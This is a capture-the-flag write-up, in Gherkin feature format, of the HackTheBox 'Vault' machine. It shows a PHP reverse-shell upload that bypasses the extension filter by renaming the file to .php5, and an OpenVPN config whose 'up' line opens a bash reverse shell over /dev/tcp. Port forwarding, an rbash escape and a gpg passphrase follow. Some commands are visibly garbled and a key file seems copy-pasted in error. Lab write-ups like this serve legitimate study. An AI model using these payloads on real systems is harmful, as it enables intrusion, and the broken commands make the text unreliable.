## Version 2.0
## language: en

Feature: Vault ctf HAckTheBox
  Site:
    https://www.hackthebox.eu
  Category:
    CTF
  User:
    congracift
  Goal:
    No extensions of image files are validated

  Background:
  Hacker's software:
    | <Software name> | <Version>                               |
    | Linux           | 4.19.0-kali1-amd64                      |
    | Nmap            | Nmap 7.70                               |
    | Nsearch         | 0.4b                                    |
    | VS code         | 1.31.1                                  |
    | Cwel            | 5.2                                     |
    | goBuster        | v2.0.1                                  |
    | netcat          | v1.10-41.1                              |
    | BurpSuite       | v1.7.36                                 |

  Machine information:
    Given I am accessing the machine through a VPN
    And SSH in the port 22
    And Http in the port 80
    And Ubuntu 16
    And ip 10.10.10.109
    And evidence [evidence] (image.png)

  Scenario: Fail: Test routes
    Given I connect me in the port 80 with browser
    Then I run gobuster with wordlist default
    And I did not find anything interesting, just files forbidden
    Then As files of server

  Scenario: Success: Find new routes
    Given I wasn't can find anything interesting
    Then on the page there was a statement
    And with Cwel I was create a wordlist, with the words of page
    Then I run with gobuster the wordlist, I found /sparklays/
    And I found a path forbidden
    But On that path run  gobuster with default wordlist
    And I found the next files
    | <Num>|  <Route>                                                | <Code>|
    | 1    |  http://sparklays.com/sparklays/admin.php               | 200   |
    | 2    |  http://sparklays.com/sparklays/design/changelogo.php   | 200   |
    | 3    |  http://sparklays.com/sparklays/design/uploads/         | 403   |
    Then the number 1 is a basic login
    Then the number 2 is a page to upload images for the logo
    Then the number 3 is page to see logos uploaded


  Scenario: Fail: Upload files
    Given I found routes interesting
    Then in the second route I upload file in png Success
    But I try upload file with extension sh, php, elf
    Then In the third route add name of file uploaded
    And I don't work

  Scenario: Success: Upload files
    Then I search in google the way get shell
    Then I found so the files php5 serves for shell reverse tcp
    Then download shell reverse tcp in php with the port 4444
    And with burpSuite capture the output package
    And I change the headers
    Then before
    """
    Content-Disposition: form-data; name=/"file"; filename="shell.php"
    """
    Then after
    """
    Content-Disposition: form-data; name="file"; filename="shell.php5"
    """
    And with netcat open port listening in the 4444
    Then I get the shell

  Scenario: Fail: Get user flag
    Given I have user www-data (33)
    Then I go the path /home/dave/Desktop/user.txt
    Then I don't found flag, I found credential of ssh client
    And In the path /home/dave/Desktop/ssh
    And In the path /home/dave/Desktop/Servers
    Then the Server said:
    """
    DNS + Configurator - 192.168.122.4
    Firewall - 192.168.122.5
    The Vault - x
    """
    Then I found new network interface for connect with server DNS and FW
    And the file in the path /home/dave/Desktop/key said
    """
    Content-Disposition: form-data; name=/"file"; filename="shell.php"
    """
    Then this is key

  Scenario: Success: Capture the user Flag
    Then First run script in python for scan ports in the DNS server
    Then In the DNS had open the ports 22 ssh and 80 http
    Then I did port forwarding with ssh, with the next command:
    """
    -L 1478:192.168.122.4:80
    """
    Then On my local browser type the next url
    """
    http:127.0.0.1:1478
    """
    Then Open a page whit 2 routes, the first was code 404
    And the second was code 202 the route is the next
    """
    http://127.0.0.1:1478/vpnconfig.php
    """
    Then the function of the page was test or upload files .ovpn
    Then run gobuster with default wordlist
    And I found the next path /notes the file said
    """
    chmod 123.ovpn and script.sh to 777
    """
    Then the most interesting is 123.ovpn
    Then because show the content file with route /123.ovpn
    Then I try several times input reverse shell into what execute this script
    """
    remote 192.168.122.1
    ifconfig 10.200.0.2 10.200.0.1
    dev tun
    script-security 2
    nobind
    up "/bin/bash -c '/bin/bash -i &> /dev/tcp/192.168.122.1/1234 0>&1'"
    """
    And open, listen in the port 1234 in the machine 192.168.122.1
    And I have a shell with root user
    And Capture the flag for own user
    Then I find flag, I found credential of ssh client
    And In the path /home/dave/Desktop/ssh
    And connect at server too, for ssh
    And I create tunel ssh, wit teh next command
    """
    -L 7777:192.168.122.4:22
    """

  Scenario: Fail: Search root flag
    Then I did enumeration of machine with tuhe next comands:
    """
    ps -aux
    find / -uid 0 -perm -4000 -print
    netstat -nap
    """
    Then  I go at /etc/hosts
    And go at /var/logs/auth.logs
    And I found the direction the new machine
    And I found a machine like connect with server DNS
    But I don't found root user flag

  Scenario: Success: Get root user flag
    Given In to file was there commands of authentication like:
    """
    ncat -l 1478 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
    """
    Then I did ping  with nmap for test
    """
    nmap 192.168.5.2 -Pn --source-port=4444 -f
    """
    Then from DNS machine I did port forwarding witn ssh
    """
    ssh -p 1478 dave@127.0.0.1
    """
    Then I get shell
    But the shell run with rbash is very restricted
    And I can't copy root flag because it is encrypted in gpg
    Then bypass rbash with the next command
    """
    cp /bin/sh /home/dave
    """
    Then run sh with the next command from DNS machine
    """
    scp -p 1478 dave@127.0.0.1/home/dave/root.txt.gpg /tmp
    """
    Then In the machine in Ubuntu the (first machine)
    Then I run the next command
    """
    scp -7777 dave@127.0.0.1/tmp/root.txt.gpg /tmp
    """
    Then As on Ubuntu gpg is preinstaled
    Then I run the next command
    """
    gpg -d /tmp/root.txt.gpg
    """
    Then I need the key for decipher, the key is
    """
    itscominghome
    """
    And I get root flag :)
